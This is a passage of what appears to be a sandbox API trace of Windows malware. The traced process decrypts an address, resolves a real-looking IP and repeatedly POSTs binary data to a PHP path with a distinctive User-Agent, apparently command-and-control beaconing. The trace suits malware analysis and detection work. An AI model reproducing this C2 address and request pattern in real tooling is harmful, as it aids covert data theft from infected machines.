sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0198.590] GetProcessHeap () returned 0x690000 [0198.590] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0198.590] socket (af=2, type=1, protocol=6) returned 0x41c [0198.591] connect (s=0x41c, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0198.618] FreeAddrInfoW (pAddrInfo=0x6a9d20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0198.618] GetProcessHeap () returned 0x690000 [0198.618] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0198.618] GetProcessHeap () returned 0x690000 [0198.618] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0198.618] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0198.619] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0198.619] GetProcessHeap () returned 0x690000 [0198.619] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0198.619] GetProcessHeap () returned 0x690000 [0198.620] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0198.621] GetProcessHeap () returned 0x690000 [0198.621] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0198.621] GetProcessHeap () returned 0x690000 [0198.621] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0198.622] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0198.623] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0198.623] GetProcessHeap () returned 0x690000 [0198.623] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0198.623] GetProcessHeap () returned 0x690000 [0198.623] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0198.623] send (s=0x41c, buf=0x6abd08*, len=242, flags=0) returned 242 [0198.624] send (s=0x41c, buf=0x6aba40*, len=159, flags=0) returned 159 [0198.624] GetProcessHeap () returned 0x690000 [0198.624] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0198.624] recv (in: s=0x41c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0198.755] GetProcessHeap () returned 0x690000 [0198.755] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0198.755] GetProcessHeap () returned 0x690000 [0198.756] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0198.756] GetProcessHeap () returned 0x690000 [0198.756] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0198.757] GetProcessHeap () returned 0x690000 [0198.757] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0198.757] closesocket (s=0x41c) returned 0 [0198.758] GetProcessHeap () returned 0x690000 [0198.758] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0198.758] GetProcessHeap () returned 0x690000 [0198.758] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0198.759] GetProcessHeap () returned 0x690000 [0198.759] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0198.759] GetProcessHeap () returned 0x690000 [0198.760] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0198.760] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1244) returned 0x41c [0198.762] Sleep (dwMilliseconds=0xea60) [0198.763] GetProcessHeap () returned 0x690000 [0198.763] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0198.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.764] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.771] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0198.777] GetProcessHeap () returned 0x690000 [0198.777] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0198.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.779] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0198.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.780] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.781] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.782] GetProcessHeap () returned 0x690000 [0198.782] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0198.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.783] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0198.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.784] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0198.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.785] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0198.785] GetProcessHeap () returned 0x690000 [0198.785] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0198.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.786] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0198.800] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.801] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0198.802] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.802] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0198.803] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.803] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0198.803] GetProcessHeap () returned 0x690000 [0198.803] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0198.803] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0198.804] GetProcessHeap () returned 0x690000 [0198.804] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0198.804] GetProcessHeap () returned 0x690000 [0198.804] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0198.804] GetProcessHeap () returned 0x690000 [0198.805] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0198.805] GetProcessHeap () returned 0x690000 [0198.805] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0198.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.806] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.811] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0198.817] GetProcessHeap () returned 0x690000 [0198.817] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0198.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.818] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0198.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.819] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.821] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.821] GetProcessHeap () returned 0x690000 [0198.821] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0198.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.822] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0198.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.823] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0198.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.825] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0198.825] GetProcessHeap () returned 0x690000 [0198.825] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0198.826] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.826] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0198.827] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.827] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0198.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.829] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0198.829] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.830] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0198.830] GetProcessHeap () returned 0x690000 [0198.830] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0198.830] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9aa0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0198.830] GetProcessHeap () returned 0x690000 [0198.830] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0198.830] socket (af=2, type=1, protocol=6) returned 0x420 [0198.830] connect (s=0x420, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0198.857] FreeAddrInfoW (pAddrInfo=0x6a9aa0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0198.857] GetProcessHeap () returned 0x690000 [0198.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0198.857] GetProcessHeap () returned 0x690000 [0198.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0198.858] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0198.859] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0198.859] GetProcessHeap () returned 0x690000 [0198.859] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0100 [0198.859] GetProcessHeap () returned 0x690000 [0198.859] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0198.860] GetProcessHeap () returned 0x690000 [0198.860] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0198.860] GetProcessHeap () returned 0x690000 [0198.860] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0198.860] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0198.861] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0198.861] GetProcessHeap () returned 0x690000 [0198.861] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0198.861] GetProcessHeap () returned 0x690000 [0198.862] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0198.862] send (s=0x420, buf=0x6abd08*, len=242, flags=0) returned 242 [0198.863] send (s=0x420, buf=0x6aba40*, len=159, flags=0) returned 159 [0198.865] GetProcessHeap () returned 0x690000 [0198.865] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0198.865] recv (in: s=0x420, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0198.948] GetProcessHeap () returned 0x690000 [0198.949] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0198.949] GetProcessHeap () returned 0x690000 [0198.949] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0198.949] GetProcessHeap () returned 0x690000 [0198.949] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0100 | out: hHeap=0x690000) returned 1 [0198.949] GetProcessHeap () returned 0x690000 [0198.949] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0198.949] closesocket (s=0x420) returned 0 [0198.950] GetProcessHeap () returned 0x690000 [0198.950] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0198.950] GetProcessHeap () returned 0x690000 [0198.950] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0198.950] GetProcessHeap () returned 0x690000 [0198.950] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0198.951] GetProcessHeap () returned 0x690000 [0198.951] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0198.951] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1248) returned 0x420 [0198.952] Sleep (dwMilliseconds=0xea60) [0198.955] GetProcessHeap () returned 0x690000 [0198.955] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0198.956] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.956] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.961] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0198.966] GetProcessHeap () returned 0x690000 [0198.966] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0198.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.967] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0198.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.968] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.969] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.969] GetProcessHeap () returned 0x690000 [0198.969] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0198.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.970] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0198.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.971] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0198.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.972] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0198.972] GetProcessHeap () returned 0x690000 [0198.972] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0198.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.973] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0198.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.974] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0198.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.975] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0198.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.976] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0198.976] GetProcessHeap () returned 0x690000 [0198.976] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0198.976] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0198.976] GetProcessHeap () returned 0x690000 [0198.977] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0198.977] GetProcessHeap () returned 0x690000 [0198.977] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0198.977] GetProcessHeap () returned 0x690000 [0198.978] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0198.978] GetProcessHeap () returned 0x690000 [0198.978] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0198.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.979] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.984] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0198.991] GetProcessHeap () returned 0x690000 [0198.991] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0198.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.992] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0198.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.993] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.994] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.994] GetProcessHeap () returned 0x690000 [0198.995] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0198.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.995] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0198.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.996] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0198.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.997] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0198.997] GetProcessHeap () returned 0x690000 [0198.997] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0198.998] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.998] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0198.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.999] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0198.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.000] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0199.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.001] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0199.001] GetProcessHeap () returned 0x690000 [0199.001] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0199.001] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6adba8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeaa8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0199.001] GetProcessHeap () returned 0x690000 [0199.001] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0199.001] socket (af=2, type=1, protocol=6) returned 0x424 [0199.001] connect (s=0x424, name=0x6aeaa8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0199.039] FreeAddrInfoW (pAddrInfo=0x6adba8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeaa8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0199.039] GetProcessHeap () returned 0x690000 [0199.039] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0199.039] GetProcessHeap () returned 0x690000 [0199.039] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0199.040] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0199.040] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 